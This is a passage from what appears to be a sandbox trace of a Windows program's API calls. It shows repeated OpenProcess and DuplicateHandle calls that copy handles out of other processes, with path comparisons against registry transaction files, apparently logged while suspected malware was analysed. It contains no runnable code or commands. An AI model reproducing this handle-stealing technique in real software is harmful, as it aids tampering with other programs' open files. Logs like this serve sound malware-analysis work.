(in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.053] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.053] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.053] CloseHandle (hObject=0x670) returned 1 [0154.053] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.053] CloseHandle (hObject=0x680) returned 1 [0154.053] CloseHandle (hObject=0x62c) returned 1 [0154.053] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x174) returned 0x62c [0154.054] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.054] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.054] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.055] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.055] CloseHandle (hObject=0x670) returned 1 [0154.055] _wcsicmp (_Str1="\\Java", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -4 [0154.055] CloseHandle (hObject=0x680) returned 1 [0154.055] CloseHandle (hObject=0x62c) returned 1 [0154.055] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e8) returned 0x62c [0154.055] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.056] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.057] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.057] CloseHandle (hObject=0x670) returned 1 [0154.057] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.057] CloseHandle (hObject=0x680) returned 1 [0154.057] CloseHandle (hObject=0x62c) returned 1 [0154.057] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7e8) returned 0x62c [0154.057] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.058] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.058] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.058] CloseHandle (hObject=0x670) returned 1 [0154.059] _wcsicmp (_Str1="\\Microsoft Office", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.059] CloseHandle (hObject=0x680) returned 1 [0154.059] CloseHandle (hObject=0x62c) returned 1 [0154.059] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7cc) returned 0x62c [0154.059] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.060] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.061] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.062] CloseHandle (hObject=0x670) returned 1 [0154.062] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.062] CloseHandle (hObject=0x680) returned 1 [0154.062] CloseHandle (hObject=0x62c) returned 1 [0154.062] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7cc) returned 0x62c [0154.062] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.062] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.063] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.063] CloseHandle (hObject=0x670) returned 1 [0154.063] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.063] CloseHandle (hObject=0x680) returned 1 [0154.063] CloseHandle (hObject=0x62c) returned 1 [0154.063] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c0) returned 0x62c [0154.063] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.063] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.064] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.065] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.065] CloseHandle (hObject=0x670) returned 1 [0154.065] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.065] CloseHandle (hObject=0x680) returned 1 [0154.065] CloseHandle (hObject=0x62c) returned 1 [0154.065] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7c0) returned 0x62c [0154.065] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.066] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.066] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.066] CloseHandle (hObject=0x670) returned 1 [0154.067] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.067] CloseHandle (hObject=0x680) returned 1 [0154.067] CloseHandle (hObject=0x62c) returned 1 [0154.067] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x304) returned 0x62c [0154.067] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.067] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.068] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.068] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.068] CloseHandle (hObject=0x670) returned 1 [0154.068] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.068] CloseHandle (hObject=0x680) returned 1 [0154.069] CloseHandle (hObject=0x62c) returned 1 [0154.069] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x304) returned 0x62c [0154.069] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.069] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.070] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.070] CloseHandle (hObject=0x670) returned 1 [0154.070] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0154.070] CloseHandle (hObject=0x680) returned 1 [0154.070] CloseHandle (hObject=0x62c) returned 1 [0154.070] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3b4) returned 0x62c [0154.070] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.071] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.071] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.072] CloseHandle (hObject=0x670) returned 1 [0154.072] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.072] CloseHandle (hObject=0x680) returned 1 [0154.072] CloseHandle (hObject=0x62c) returned 1 [0154.072] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x3b4) returned 0x62c [0154.072] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.072] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.073] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.073] CloseHandle (hObject=0x670) returned 1 [0154.073] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.073] CloseHandle (hObject=0x680) returned 1 [0154.073] CloseHandle (hObject=0x62c) returned 1 [0154.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x318) returned 0x62c [0154.073] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.074] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.075] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.075] CloseHandle (hObject=0x670) returned 1 [0154.075] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.075] CloseHandle (hObject=0x680) returned 1 [0154.075] CloseHandle (hObject=0x62c) returned 1 [0154.075] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x318) returned 0x62c [0154.075] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.076] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.076] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.076] CloseHandle (hObject=0x670) returned 1 [0154.076] _wcsicmp (_Str1="\\Windows Journal", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.076] CloseHandle (hObject=0x680) returned 1 [0154.077] CloseHandle (hObject=0x62c) returned 1 [0154.077] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6c0) returned 0x62c [0154.077] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.077] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.078] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.078] CloseHandle (hObject=0x670) returned 1 [0154.078] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.078] CloseHandle (hObject=0x680) returned 1 [0154.078] CloseHandle (hObject=0x62c) returned 1 [0154.078] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x6c0) returned 0x62c [0154.078] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.079] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.081] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.081] CloseHandle (hObject=0x670) returned 1 [0154.081] _wcsicmp (_Str1="\\Uninstall Information", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0154.081] CloseHandle (hObject=0x680) returned 1 [0154.081] CloseHandle (hObject=0x62c) returned 1 [0154.081] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x408) returned 0x62c [0154.082] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.082] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.082] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.083] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.083] CloseHandle (hObject=0x670) returned 1 [0154.083] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.083] CloseHandle (hObject=0x680) returned 1 [0154.083] CloseHandle (hObject=0x62c) returned 1 [0154.083] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x408) returned 0x62c [0154.083] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.083] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.084] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.084] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.084] CloseHandle (hObject=0x670) returned 1 [0154.085] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.085] CloseHandle (hObject=0x680) returned 1 [0154.085] CloseHandle (hObject=0x62c) returned 1 [0154.085] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x62c [0154.085] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.085] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.086] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.086] CloseHandle (hObject=0x670) returned 1 [0154.086] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.086] CloseHandle (hObject=0x680) returned 1 [0154.086] CloseHandle (hObject=0x62c) returned 1 [0154.086] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x734) returned 0x62c [0154.086] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.087] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.088] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.088] CloseHandle (hObject=0x670) returned 1 [0154.088] _wcsicmp (_Str1="\\Windows Defender", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.088] CloseHandle (hObject=0x680) returned 1 [0154.088] CloseHandle (hObject=0x62c) returned 1 [0154.088] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4fc) returned 0x62c [0154.088] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.088] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.089] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.089] CloseHandle (hObject=0x670) returned 1 [0154.089] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.089] CloseHandle (hObject=0x680) returned 1 [0154.089] CloseHandle (hObject=0x62c) returned 1 [0154.089] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4fc) returned 0x62c [0154.089] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.090] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.091] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.091] CloseHandle (hObject=0x670) returned 1 [0154.091] _wcsicmp (_Str1="\\Microsoft.NET", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0154.091] CloseHandle (hObject=0x680) returned 1 [0154.091] CloseHandle (hObject=0x62c) returned 1 [0154.091] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x51c) returned 0x62c [0154.091] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.091] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.092] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.092] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.092] CloseHandle (hObject=0x670) returned 1 [0154.092] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.092] CloseHandle (hObject=0x680) returned 1 [0154.092] CloseHandle (hObject=0x62c) returned 1 [0154.092] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x51c) returned 0x62c [0154.092] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.092] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.093] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.094] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.094] CloseHandle (hObject=0x670) returned 1 [0154.094] _wcsicmp (_Str1="\\Windows Photo Viewer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.094] CloseHandle (hObject=0x680) returned 1 [0154.094] CloseHandle (hObject=0x62c) returned 1 [0154.094] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x62c [0154.094] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0154.095] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0154.095] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0154.096] CloseHandle (hObject=0x670) returned 1 [0154.096] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 9 [0154.096] CloseHandle (hObject=0x680) returned 1 [0154.096] CloseHandle (hObject=0x62c) returned 1 [0154.096] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x7d4) returned 0x62c [0154.096] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0154.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, 